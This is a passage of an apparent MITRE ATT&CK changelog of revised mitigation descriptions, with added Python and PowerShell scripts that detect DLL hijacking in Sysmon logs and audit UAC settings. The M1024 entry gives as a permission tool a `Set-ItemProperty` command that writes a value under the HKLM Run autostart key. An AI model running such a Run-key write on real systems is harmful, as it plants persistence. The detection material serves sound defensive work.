- Monitor user-writable directories and system configurations for unauthorized changes.
Audit and Monitor Library Loading:
- Enable `Sysmon` on Windows to monitor for suspicious library loads.
- Use `auditd` on Linux to monitor shared library paths and configuration file changes.
Use Application Control Solutions:
- Implement AppLocker, WDAC, or SELinux to allow only trusted libraries.
*Tools for Implementation*
Windows-Specific Tools:
- AppLocker: Application whitelisting for DLLs.
- Windows Defender Application Control (WDAC): Restrict unauthorized library execution.
- Signtool: Verify and enforce code signing.
- Sysmon: Monitor DLL load events (Event ID 7).
Linux-Specific Tools:
- auditd: Monitor changes to library paths and critical files.
- SELinux/AppArmor: Define policies to restrict library loading.
- ldconfig and chattr: Secure LD configuration files and prevent unauthorized modifications.
Cross-Platform Solutions:
- Wazuh or OSSEC: File integrity monitoring for library changes.
- Tripwire: Detect and alert on unauthorized library modifications. |
x_mitre_version | 1.0 | 1.1 |
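As an added example for the "Audit and Monitor Library Loading" measure in the new M1044 description (not code from ATT&CK): a triage pass over Sysmon Event ID 7 (ImageLoaded) records that flags unsigned libraries loaded from user-writable paths and system library names resolving outside System32/SysWOW64, the pattern behind DLL search order hijacking. The field names `Image`, `ImageLoaded`, `Signed` and `SignatureStatus` are Sysmon's; the records and the `SYSTEM_DLL_BASELINE` set are constructed for the example.

```python
"""Triage Sysmon Event ID 7 (ImageLoaded) records for library-loading abuse.

Added example: the records below stand in for EventData fields parsed from
the Sysmon operational log; they are constructed, not real telemetry.
"""
from __future__ import annotations

from dataclasses import dataclass

# Directories whose contents the OS loads as trusted system libraries.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Locations an unprivileged user can write to; a DLL here is attacker-placeable.
USER_WRITABLE_DIRS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")
# Constructed baseline of library names that normally resolve into SYSTEM_DIRS.
# In production, build it by enumerating System32 on a clean reference host.
SYSTEM_DLL_BASELINE = {"version.dll", "dbghelp.dll", "cryptbase.dll"}


@dataclass(frozen=True)
class Alert:
    record_id: int
    image: str               # process that performed the load
    image_loaded: str        # library that was loaded
    rules: tuple[str, ...]   # detection rules the record tripped


def _is_trusted_signature(ev: dict) -> bool:
    # Sysmon reports Signed as "true"/"false" and SignatureStatus as e.g. "Valid".
    return (ev.get("Signed", "").lower() == "true"
            and ev.get("SignatureStatus", "").lower() == "valid")


def classify(ev: dict) -> tuple[str, ...]:
    """Return the rule names an Event ID 7 record trips (empty if benign)."""
    loaded = ev["ImageLoaded"].lower()
    name = loaded.rsplit("\\", 1)[-1]
    rules: list[str] = []
    # Rule 1: an unsigned (or unverifiable) library from a user-writable path.
    if loaded.startswith(USER_WRITABLE_DIRS) and not _is_trusted_signature(ev):
        rules.append("unsigned_dll_from_user_writable_path")
    # Rule 2: a system library name resolved outside the system directories,
    # which is what a search-order hijack looks like in the load telemetry.
    if name in SYSTEM_DLL_BASELINE and not loaded.startswith(SYSTEM_DIRS):
        rules.append("system_dll_name_outside_system_dir")
    return tuple(rules)


def detect(events: list[dict]) -> list[Alert]:
    """Run classify() over a batch of records and keep only those that alert."""
    alerts: list[Alert] = []
    for ev in events:
        rules = classify(ev)
        if rules:
            alerts.append(Alert(ev["EventRecordID"], ev["Image"], ev["ImageLoaded"], rules))
    return alerts


# Constructed sample records (fields as Sysmon names them).
SAMPLE_EVENTS = [
    {"EventRecordID": 1, "Image": r"C:\Windows\explorer.exe",
     "ImageLoaded": r"C:\Windows\System32\version.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventRecordID": 2, "Image": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "ImageLoaded": r"C:\Users\alice\AppData\Local\Temp\version.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"EventRecordID": 3, "Image": r"C:\Program Files\Vendor\app.exe",
     "ImageLoaded": r"C:\Program Files\Vendor\helper.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventRecordID": 4, "Image": r"C:\Windows\System32\svchost.exe",
     "ImageLoaded": r"C:\ProgramData\cache\dbghelp.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventRecordID": 5, "Image": r"C:\Users\bob\Downloads\tool.exe",
     "ImageLoaded": r"C:\Users\bob\Downloads\tool.dll",
     "Signed": "false", "SignatureStatus": "Unavailable"},
]

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"record {a.record_id}: {a.image_loaded} loaded by {a.image}: {', '.join(a.rules)}")
```

Record 4 shows why rule 2 does not require a signature failure: a validly signed copy of a system library name outside System32 is still the shape of a hijack and deserves a look.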
[M1024] Restrict Registry Permissions
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-03-31 17:12:06.164000+00:00 | 2024-12-24 13:34:49.309000+00:00 |
description | Restrict the ability to modify certain hives or keys in the Windows Registry. | Restricting registry permissions involves configuring access control settings for sensitive registry keys and hives to ensure that only authorized users or processes can make modifications. By limiting access, organizations can prevent unauthorized changes that adversaries might use for persistence, privilege escalation, or defense evasion. This mitigation can be implemented through the following measures:
Review and Adjust Permissions on Critical Keys
- Regularly review permissions on keys such as `Run`, `RunOnce`, and `Services` to ensure only authorized users have write access.
- Use tools like `icacls` or `PowerShell` to automate permission adjustments.
Enable Registry Auditing
- Enable auditing on sensitive keys to log access attempts.
- Use Event Viewer or SIEM solutions to analyze logs and detect suspicious activity.
- Example Audit Policy: `auditpol /set /subcategory:"Registry" /success:enable /failure:enable`
Protect Credential-Related Hives
- Limit access to hives like `SAM`, `SECURITY`, and `SYSTEM` to prevent credential dumping or other unauthorized access.
- Use LSA Protection to add an additional security layer for credential storage.
Restrict Registry Editor Usage
- Use Group Policy to restrict access to regedit.exe for non-administrative users.
- Block execution of registry editing tools on endpoints where they are unnecessary.
Deploy Baseline Configuration Tools
- Use tools like Microsoft Security Compliance Toolkit or CIS Benchmarks to apply and maintain secure registry configurations.
*Tools for Implementation*
Registry Permission Tools:
- Registry Editor (regedit): Built-in tool to manage registry permissions.
- PowerShell: Automate permissions and manage keys. `Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "KeyName" -Value "Value"`
- icacls: Command-line tool to modify ACLs.
Monitoring Tools:
- Sysmon: Monitor and log registry events.
- Event Viewer: View registry access logs.
Policy Management Tools:
- Group Policy Management Console (GPMC): Enforce registry permissions via GPOs.
- Microsoft Endpoint Manager: Deploy configuration baselines for registry permissions. |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
[M1021] Restrict Web-Based Content
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-06-06 20:52:59.206000+00:00 | 2024-12-24 13:40:41.043000+00:00 |
description | Restrict use of certain websites, block downloads/attachments, block Javascript, restrict browser extensions, etc. | Restricting web-based content involves enforcing policies and technologies that limit access to potentially malicious websites, unsafe downloads, and unauthorized browser behaviors. This can include URL filtering, download restrictions, script blocking, and extension control to protect against exploitation, phishing, and malware delivery. This mitigation can be implemented through the following measures:
Deploy Web Proxy Filtering:
- Use solutions to filter web traffic based on categories, reputation, and content types.
- Enforce policies that block unsafe websites or file types at the gateway level.
Enable DNS-Based Filtering:
- Implement tools to restrict access to domains associated with malware or phishing campaigns.
- Use public DNS filtering services to enhance protection.
Enforce Content Security Policies (CSP):
- Configure CSP headers on internal and external web applications to restrict script execution, iframe embedding, and cross-origin requests.
Control Browser Features:
- Disable unapproved browser features like automatic downloads, developer tools, or unsafe scripting.
- Enforce policies through tools like Group Policy Management to control browser settings.
Monitor and Alert on Web-Based Threats:
- Use SIEM tools to collect and analyze web proxy logs for signs of anomalous or malicious activity.
- Configure alerts for access attempts to blocked domains or repeated file download failures. |
x_mitre_version | 1.0 | 1.1 |
[M1020] SSL/TLS Inspection
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-06-06 20:15:34.146000+00:00 | 2024-12-24 13:46:05.302000+00:00 |
description | Break and inspect SSL/TLS sessions to look at encrypted web traffic for adversary activity. | SSL/TLS inspection involves decrypting encrypted network traffic to examine its content for signs of malicious activity. This capability is crucial for detecting threats that use encryption to evade detection, such as phishing, malware, or data exfiltration. After inspection, the traffic is re-encrypted and forwarded to its destination. This mitigation can be implemented through the following measures:
Deploy SSL/TLS Inspection Appliances:
- Implement SSL/TLS inspection solutions to decrypt and inspect encrypted traffic.
- Ensure appliances are placed at critical network choke points for maximum coverage.
Configure Decryption Policies:
- Define rules to decrypt traffic for specific applications, ports, or domains.
- Avoid decrypting sensitive or privacy-related traffic, such as financial or healthcare websites, to comply with regulations.
Integrate Threat Intelligence:
- Use threat intelligence feeds to correlate inspected traffic with known indicators of compromise (IOCs).
Integrate with Security Tools:
- Combine SSL/TLS inspection with SIEM and NDR tools to analyze decrypted traffic and generate alerts for suspicious activity.
- Example Tools: Splunk, Darktrace
Implement Certificate Management:
- Use trusted internal or third-party certificates for traffic re-encryption after inspection.
- Regularly update certificate authorities (CAs) to ensure secure re-encryption.
Monitor and Tune:
- Continuously monitor SSL/TLS inspection logs for anomalies and fine-tune policies to reduce false positives. |
x_mitre_version | 1.0 | 1.1 |
[M1054] Software Configuration
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2023-12-26 19:17:13.293000+00:00 | 2024-12-24 14:02:11.579000+00:00 |
description | Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates. | Software configuration refers to making security-focused adjustments to the settings of applications, middleware, databases, or other software to mitigate potential threats. These changes help reduce the attack surface, enforce best practices, and protect sensitive data. This mitigation can be implemented through the following measures:
Conduct a Security Review of Application Settings:
- Review the software documentation to identify recommended security configurations.
- Compare default settings against organizational policies and compliance requirements.
Implement Access Controls and Permissions:
- Restrict access to sensitive features or data within the software.
- Enforce least privilege principles for all roles and accounts interacting with the software.
Enable Logging and Monitoring:
- Configure detailed logging for key application events such as authentication failures, configuration changes, or unusual activity.
- Integrate logs with a centralized monitoring solution, such as a SIEM.
Update and Patch Software Regularly:
- Ensure the software is kept up-to-date with the latest security patches to address known vulnerabilities.
- Use automated patch management tools to streamline the update process.
Disable Unnecessary Features or Services:
- Turn off unused functionality or components that could introduce vulnerabilities, such as debugging interfaces or deprecated APIs.
Test Configuration Changes:
- Perform configuration changes in a staging environment before applying them in production.
- Conduct regular audits to ensure that settings remain aligned with security policies.
*Tools for Implementation*
Configuration Management Tools:
- Ansible: Automates configuration changes across multiple applications and environments.
- Chef: Ensures consistent application settings through code-based configuration management.
- Puppet: Automates software configurations and audits changes for compliance.
Security Benchmarking Tools:
- CIS-CAT: Provides benchmarks and audits for secure software configurations.
- Aqua Security Trivy: Scans containerized applications for configuration issues.
Vulnerability Management Solutions:
- Nessus: Identifies misconfigurations and suggests corrective actions.
Logging and Monitoring Tools:
- Splunk: Aggregates and analyzes application logs to detect suspicious activity. |
x_mitre_version | 1.2 | 1.3 |
[M1019] Threat Intelligence Program
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2019-06-06 19:55:50.927000+00:00 | 2024-12-24 14:05:21.946000+00:00 |
description | A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk. | A Threat Intelligence Program enables organizations to proactively identify, analyze, and act on cyber threats by leveraging internal and external data sources. The program supports decision-making processes, prioritizes defenses, and improves incident response by delivering actionable intelligence tailored to the organization's risk profile and operational environment. This mitigation can be implemented through the following measures:
Establish a Threat Intelligence Team:
- Form a dedicated team or assign responsibility to existing security personnel to collect, analyze, and act on threat intelligence.
Define Intelligence Requirements:
- Identify the organization’s critical assets and focus intelligence gathering efforts on threats targeting these assets.
Leverage Internal and External Data Sources:
- Collect intelligence from internal sources such as logs, incidents, and alerts.
- Subscribe to external threat intelligence feeds, participate in ISACs, and monitor open-source intelligence (OSINT).
Implement Tools for Automation:
- Use threat intelligence platforms (TIPs) to automate the collection, enrichment, and dissemination of threat data.
- Integrate threat intelligence with SIEMs to correlate IOCs with internal events.
Analyze and Act on Intelligence:
- Use frameworks like MITRE ATT&CK to map intelligence to adversary TTPs.
- Prioritize defensive measures, such as patching vulnerabilities or deploying IOCs, based on analyzed threats.
Share and Collaborate:
- Share intelligence with industry peers through ISACs or threat-sharing platforms to enhance collective defense.
Evaluate and Update the Program:
- Regularly assess the effectiveness of the threat intelligence program.
- Update intelligence priorities and capabilities as new threats emerge.
*Tools for Implementation*
Threat Intelligence Platforms (TIPs):
- OpenCTI: An open-source platform for structuring and sharing threat intelligence.
- MISP: A threat intelligence sharing platform for sharing structured threat data.
Threat Intelligence Feeds:
- Open Threat Exchange (OTX): Provides free access to a large repository of threat intelligence.
- CIRCL OSINT Feed: A free source for IOCs and threat information.
Automation and Enrichment Tools:
- TheHive: An open-source incident response platform with threat intelligence integration.
- Yeti: A platform for managing and structuring knowledge about threats.
Analysis Frameworks:
- MITRE ATT&CK Navigator: A tool for mapping threat intelligence to adversary behaviors.
- Cuckoo Sandbox: Analyzes malware to extract behavioral indicators.
Community and Collaboration Tools:
- ISAC Memberships: Join industry-specific ISACs for intelligence sharing.
- Slack/Discord Channels: Participate in threat intelligence communities for real-time collaboration. |
x_mitre_version | 1.0 | 1.1 |
[M1051] Update Software
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-07-07 12:42:39.005000+00:00 | 2024-12-24 14:20:09.399000+00:00 |
description | Perform regular software updates to mitigate exploitation risk. | Software updates ensure systems are protected against known vulnerabilities by applying patches and upgrades provided by vendors. Regular updates reduce the attack surface and prevent adversaries from exploiting known security gaps. This includes patching operating systems, applications, drivers, and firmware. This mitigation can be implemented through the following measures:
Regular Operating System Updates
- Implementation: Apply the latest Windows security updates monthly using WSUS (Windows Server Update Services) or a similar patch management solution. Configure systems to check for updates automatically and schedule reboots during maintenance windows.
- Use Case: Prevents exploitation of OS vulnerabilities such as privilege escalation or remote code execution.
Application Patching
- Implementation: Monitor Apache's update release notes for security patches addressing vulnerabilities. Schedule updates for off-peak hours to avoid downtime while maintaining security compliance.
- Use Case: Prevents exploitation of web application vulnerabilities, such as those leading to unauthorized access or data breaches.
Firmware Updates
- Implementation: Regularly check the vendor’s website for firmware updates addressing vulnerabilities. Plan for update deployment during scheduled maintenance to minimize business disruption.
- Use Case: Protects against vulnerabilities that adversaries could exploit to gain access to network devices or inject malicious traffic.
Emergency Patch Deployment
- Implementation: Use the emergency patch deployment feature of the organization's patch management tool to apply updates to all affected Exchange servers within 24 hours.
- Use Case: Reduces the risk of exploitation by rapidly addressing critical vulnerabilities.
Centralized Patch Management
- Implementation: Implement a centralized patch management system, such as SCCM or ManageEngine, to automate and track patch deployment across all environments. Generate regular compliance reports to ensure all systems are updated.
- Use Case: Streamlines patching processes and ensures no critical systems are missed.
*Tools for Implementation*
Patch Management Tools:
- WSUS: Manage and deploy Microsoft updates across the organization.
- ManageEngine Patch Manager Plus: Automate patch deployment for OS and third-party apps.
- Ansible: Automate updates across multiple platforms, including Linux and Windows.
Vulnerability Scanning Tools:
- OpenVAS: Open-source vulnerability scanning to identify missing patches. |
x_mitre_version | 1.0 | 1.1 |
[M1052] User Account Control
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-03-31 13:49:49.636000+00:00 | 2024-12-24 14:26:43.340000+00:00 |
description | Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access. | User Account Control (UAC) is a security feature in Microsoft Windows that prevents unauthorized changes to the operating system. UAC prompts users to confirm or provide administrator credentials when an action requires elevated privileges. Proper configuration of UAC reduces the risk of privilege escalation attacks. This mitigation can be implemented through the following measures:
Enable UAC Globally:
- Ensure UAC is enabled through Group Policy by setting `User Account Control: Run all administrators in Admin Approval Mode` to `Enabled`.
Require Credential Prompt:
- Use Group Policy to configure UAC to prompt for administrative credentials instead of just confirmation (`User Account Control: Behavior of the elevation prompt`).
Restrict Built-in Administrator Account:
Set `Admin Approval Mode` for the built-in Administrator account to `Enabled` in Group Policy.
Secure the UAC Prompt:
- Configure UAC prompts to display on the secure desktop (`User Account Control: Switch to the secure desktop when prompting for elevation`).
Prevent UAC Bypass:
- Block untrusted applications from triggering UAC prompts by configuring `User Account Control: Only elevate executables that are signed and validated`.
- Use EDR tools to detect and block known UAC bypass techniques.
Monitor UAC-Related Events:
- Use Windows Event Viewer to monitor for event ID 4688 (process creation) and look for suspicious processes attempting to invoke UAC elevation.
*Tools for Implementation*
Built-in Windows Tools:
- Group Policy Editor: Configure UAC settings centrally for enterprise environments.
- Registry Editor: Modify UAC-related settings directly, such as `EnableLUA` and `ConsentPromptBehaviorAdmin`.
Endpoint Security Solutions:
- Microsoft Defender for Endpoint: Detects and blocks UAC bypass techniques.
- Sysmon: Logs process creations and monitors UAC elevation attempts for suspicious activity.
Third-Party Security Tools:
- Process Monitor (Sysinternals): Tracks real-time processes interacting with UAC.
- EventSentry: Monitors Windows Event Logs for UAC-related alerts. |
x_mitre_version | 1.1 | 1.2 |
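Added example, not part of the ATT&CK changelog or of MITRE's data: a PowerShell audit of the registry values that back the Group Policy settings this entry lists (`EnableLUA`, `ConsentPromptBehaviorAdmin`, and the secure-desktop, code-signing and built-in Administrator settings), followed by a pull of event ID 4688 records for processes that started with a full elevated token. The key path, value names and Windows defaults are the documented Windows locations; the expected values are an assumed hardened baseline, and `Get-RecentElevatedProcessStart` is a name chosen here.

```powershell
# Added example: audit the UAC settings behind the M1052 measures and list
# recent elevated process starts. Not MITRE's code; adjust the baseline to
# your own policy before using the results.

$UacKey = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

# Each registry value, the Group Policy setting it implements, the Windows
# default that applies when the value is absent, and the accepted values.
# ConsentPromptBehaviorAdmin: 1 = credentials on the secure desktop,
# 3 = credentials on the normal desktop (secure desktop is then governed by
# PromptOnSecureDesktop), 2/4 = consent only, 5 = default, 0 = no prompt.
$Checks = @(
    @{ Name = 'EnableLUA';                   Default = 1; Expected = @(1)
       Policy = 'Run all administrators in Admin Approval Mode' }
    @{ Name = 'ConsentPromptBehaviorAdmin';  Default = 5; Expected = @(1, 3)
       Policy = 'Behavior of the elevation prompt (prompt for credentials)' }
    @{ Name = 'PromptOnSecureDesktop';       Default = 1; Expected = @(1)
       Policy = 'Switch to the secure desktop when prompting for elevation' }
    @{ Name = 'ValidateAdminCodeSignatures'; Default = 0; Expected = @(1)
       Policy = 'Only elevate executables that are signed and validated' }
    @{ Name = 'FilterAdministratorToken';    Default = 0; Expected = @(1)
       Policy = 'Admin Approval Mode for the Built-in Administrator account' }
)

function Test-UacConfiguration {
    # Returns one finding per setting; a missing value is reported at its default.
    $props = Get-ItemProperty -Path $UacKey -ErrorAction SilentlyContinue
    foreach ($c in $Checks) {
        $actual = $c.Default
        if ($null -ne $props -and $props.PSObject.Properties.Name -contains $c.Name) {
            $actual = [int]$props.($c.Name)
        }
        [pscustomobject]@{
            Value     = $c.Name
            Policy    = $c.Policy
            Actual    = $actual
            Expected  = ($c.Expected -join ' or ')
            Compliant = ($c.Expected -contains $actual)
        }
    }
}

function Get-RecentElevatedProcessStart {
    param([int]$Hours = 24)
    # Event 4688 is only written when "Audit Process Creation" is enabled.
    $filter = @{ LogName = 'Security'; Id = 4688; StartTime = (Get-Date).AddHours(-$Hours) }
    Get-WinEvent -FilterHashtable $filter -ErrorAction SilentlyContinue | ForEach-Object {
        $data = ([xml]$_.ToXml()).Event.EventData.Data
        $type = ($data | Where-Object Name -eq 'TokenElevationType').'#text'
        # %%1937 = TokenElevationTypeFull: the new process holds a full
        # administrator token, i.e. it was elevated (prompt answered or auto-elevated).
        if ($type -eq '%%1937') {
            [pscustomobject]@{
                Time    = $_.TimeCreated
                User    = ($data | Where-Object Name -eq 'SubjectUserName').'#text'
                Process = ($data | Where-Object Name -eq 'NewProcessName').'#text'
                Parent  = ($data | Where-Object Name -eq 'ParentProcessName').'#text'
            }
        }
    }
}

$findings = Test-UacConfiguration
$findings | Format-Table -AutoSize
$deviations = @($findings | Where-Object { -not $_.Compliant })
if ($deviations.Count -gt 0) {
    Write-Warning "$($deviations.Count) UAC setting(s) deviate from the assumed baseline."
}

# Elevated starts whose parent is an unexpected process are the ones to triage.
Get-RecentElevatedProcessStart -Hours 24 | Select-Object -First 25 | Format-Table -AutoSize
```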
[M1018] User Account Management
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-05-20 13:49:12.270000+00:00 | 2024-12-24 14:33:36.029000+00:00 |
description | Manage the creation, modification, use, and permissions associated to user accounts. | User Account Management involves implementing and enforcing policies for the lifecycle of user accounts, including creation, modification, and deactivation. Proper account management reduces the attack surface by limiting unauthorized access, managing account privileges, and ensuring accounts are used according to organizational policies. This mitigation can be implemented through the following measures:
Enforcing the Principle of Least Privilege
- Implementation: Assign users only the minimum permissions required to perform their job functions. Regularly audit accounts to ensure no excess permissions are granted.
- Use Case: Reduces the risk of privilege escalation by ensuring accounts cannot perform unauthorized actions.
Implementing Strong Password Policies
- Implementation: Enforce password complexity requirements (e.g., length, character types). Require password expiration every 90 days and disallow password reuse.
- Use Case: Prevents adversaries from gaining unauthorized access through password guessing or brute force attacks.
Managing Dormant and Orphaned Accounts
- Implementation: Implement automated workflows to disable accounts after a set period of inactivity (e.g., 30 days). Remove orphaned accounts (e.g., accounts without an assigned owner) during regular account audits.
- Use Case: Eliminates dormant accounts that could be exploited by attackers.
Account Lockout Policies
- Implementation: Configure account lockout thresholds (e.g., lock accounts after five failed login attempts). Set lockout durations to a minimum of 15 minutes.
- Use Case: Mitigates automated attack techniques that rely on repeated login attempts.
Multi-Factor Authentication (MFA) for High-Risk Accounts
- Implementation: Require MFA for all administrative accounts and high-risk users. Use MFA mechanisms like hardware tokens, authenticator apps, or biometrics.
- Use Case: Prevents unauthorized access, even if credentials are stolen.
Restricting Interactive Logins
- Implementation: Restrict interactive logins for privileged accounts to specific secure systems or management consoles. Use group policies to enforce logon restrictions.
- Use Case: Protects sensitive accounts from misuse or exploitation.
*Tools for Implementation*
Built-in Tools:
- Microsoft Active Directory (AD): Centralized account management and RBAC enforcement.
- Group Policy Object (GPO): Enforce password policies, logon restrictions, and account lockout policies.
Identity and Access Management (IAM) Tools:
- Okta: Centralized user provisioning, MFA, and SSO integration.
- Microsoft Azure Active Directory: Provides advanced account lifecycle management, role-based access, and conditional access policies.
Privileged Account Management (PAM):
- CyberArk, BeyondTrust, Thycotic: Manage and monitor privileged account usage, enforce session recording, and JIT access. |
x_mitre_version | 1.1 | 1.2 |
[M1017] User Training
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-17 18:55:19.798000+00:00 | 2024-12-24 14:36:46.335000+00:00 |
description | Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction. | User Training involves educating employees and contractors on recognizing, reporting, and preventing cyber threats that rely on human interaction, such as phishing, social engineering, and other manipulative techniques. Comprehensive training programs create a human firewall by empowering users to be an active component of the organization's cybersecurity defenses. This mitigation can be implemented through the following measures:
Create Comprehensive Training Programs:
- Design training modules tailored to the organization's risk profile, covering topics such as phishing, password management, and incident reporting.
- Provide role-specific training for high-risk employees, such as helpdesk staff or executives.
Use Simulated Exercises:
- Conduct phishing simulations to measure user susceptibility and provide targeted follow-up training.
- Run social engineering drills to evaluate employee responses and reinforce protocols.
Leverage Gamification and Engagement:
- Introduce interactive learning methods such as quizzes, gamified challenges, and rewards for successful detection and reporting of threats.
Incorporate Security Policies into Onboarding:
- Include cybersecurity training as part of the onboarding process for new employees.
- Provide easy-to-understand materials outlining acceptable use policies and reporting procedures.
Regular Refresher Courses:
- Update training materials to include emerging threats and techniques used by adversaries.
- Ensure all employees complete periodic refresher courses to stay informed.
Emphasize Real-World Scenarios:
- Use case studies of recent attacks to demonstrate the consequences of successful phishing or social engineering.
- Discuss how specific employee actions can prevent or mitigate such attacks. |
x_mitre_version | 1.2 | 1.3 |
[M1016] Vulnerability Scanning
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_added
STIX Field | Old value | New Value |
---|---|---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2020-07-14 22:22:06.356000+00:00 | 2024-12-24 14:41:01.585000+00:00 |
description | Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them. | Vulnerability scanning involves the automated or manual assessment of systems, applications, and networks to identify misconfigurations, unpatched software, or other security weaknesses. The process helps prioritize remediation efforts by classifying vulnerabilities based on risk and impact, reducing the likelihood of exploitation by adversaries. This mitigation can be implemented through the following measures:
Proactive Identification of Vulnerabilities
- Implementation: Use tools like Nessus or OpenVAS to scan endpoints, servers, and applications for missing patches and configuration issues. Schedule regular scans to ensure timely identification of vulnerabilities introduced by new deployments or updates.
- Use Case: A scan identifies unpatched software, such as outdated Apache servers, which could be exploited via CVE-XXXX-XXXX. The server is promptly patched, mitigating the risk.
Cloud Environment Scanning
- Implementation: Use cloud-specific vulnerability management tools like AWS Inspector, Azure Security Center, or GCP Security Command Center to identify issues like open S3 buckets or overly permissive IAM roles.
- Use Case: The scan detects a misconfigured S3 bucket with public read access, which is remediated to prevent potential data leakage.
Network Device Scanning
- Implementation: Use tools to scan network devices for vulnerabilities, such as weak SNMP strings or outdated firmware. Correlate scan results with vendor advisories to prioritize updates.
- Use Case: Scanning detects a router running outdated firmware vulnerable to CVE-XXXX-YYYY. The firmware is updated to a secure version.
Web Application Scanning
- Implementation: Use dynamic application security testing (DAST) tools such as OWASP ZAP or Burp Suite to scan for common vulnerabilities like SQL injection or cross-site scripting (XSS). Perform regular scans post-deployment to identify newly introduced vulnerabilities.
- Use Case: A scan identifies a cross-site scripting vulnerability in a form input field, which is promptly remediated by developers.
Prioritizing Vulnerabilities
- Implementation: Use vulnerability scoring frameworks like CVSS to assess severity. Integrate vulnerability scanning tools with ticketing systems to assign remediation tasks based on criticality.
- Use Case: A critical vulnerability with a CVSS score of 9.8 affecting remote access servers is prioritized and patched first.
*Tools for Implementation*
Open Source Tools:
- OpenVAS: Comprehensive network and system vulnerability scanning.
- OWASP ZAP: Dynamic scanning of web applications for vulnerabilities.
- Nmap with NSE Scripts: Network scanning with scripts to detect vulnerabilities. |
x_mitre_version | 1.1 | 1.2 |
Patches
[M1015] Active Directory Configuration
Current version: 1.2
Details
values_changed
STIX Field | Old value | New Value |
---|---|---|
modified | 2024-10-08 17:01:33.131000+00:00 | 2024-12-10 15:57:59.336000+00:00 |
description | Implement robust Active Directory configurations using group policies to control access and reduce the attack surface. Specific examples include:
* Account Configuration: Use provisioned domain accounts rather than local accounts to leverage centralized control and auditing capabilities.
* Interactive Logon Restrictions: Enforce group policies that prohibit interactive logons for accounts that should not directly access systems.
* Remote Desktop Settings: Limit Remote Desktop logons to authorized accounts to prevent misuse by adversaries.
* Dedicated Administrative Accounts: Create specialized domain-wide accounts that are restricted from interactive logons but can perform specific tasks like installations or repository access.
* Authentication Silos: Configure Authentication Silos in Active Directory to create access zones with restrictions based on membership in the Protected Users global security group. This setup enhances security by applying additional protections to high-risk accounts, limiting their exposure to potential attacks. | Implement robust Active Directory (AD) configurations using group policies to secure user accounts, control access, and minimize the attack surface. AD configurations enable centralized control over account settings, logon policies, and permissions, reducing the risk of unauthorized access and lateral movement within the network. This mitigation can be implemented through the following measures:
Account Configuration:
- Implementation: Use domain accounts instead of local accounts to leverage AD’s centralized management, including group policies, auditing, and access control.
- Use Case: For IT staff managing shared resources, provision domain accounts that allow IT teams to log in centrally, reducing the risk of unmanaged, rogue local accounts on individual machines.
Interactive Logon Restrictions:
- Implementation: Configure group policies to restrict interactive logons (e.g., direct physical or RDP logons) for service accounts or privileged accounts that do not require such access.
- Use Case: Prevent service accounts, such as SQL Server accounts, from having interactive logon privileges. This reduces the risk of these accounts being leveraged for lateral movement if compromised.
Remote Desktop Settings:
- Implementation: Limit Remote Desktop Protocol (RDP) access to specific, authorized accounts. Use group policies to enforce this, allowing only necessary users to establish RDP sessions.
- Use Case: On sensitive servers (e.g., domain controllers or financial databases), restrict RDP access to administrative accounts only, while all other users are denied access.
Dedicated Administrative Accounts:
- Implementation: Create domain-wide administrative accounts that are restricted from interactive logons, designed solely for high-level tasks (e.g., software installation, patching).
- Use Case: Create separate administrative accounts for different purposes, such as one set of accounts for installations and another for managing repository access. This limits exposure and helps reduce attack vectors.
Authentication Silos:
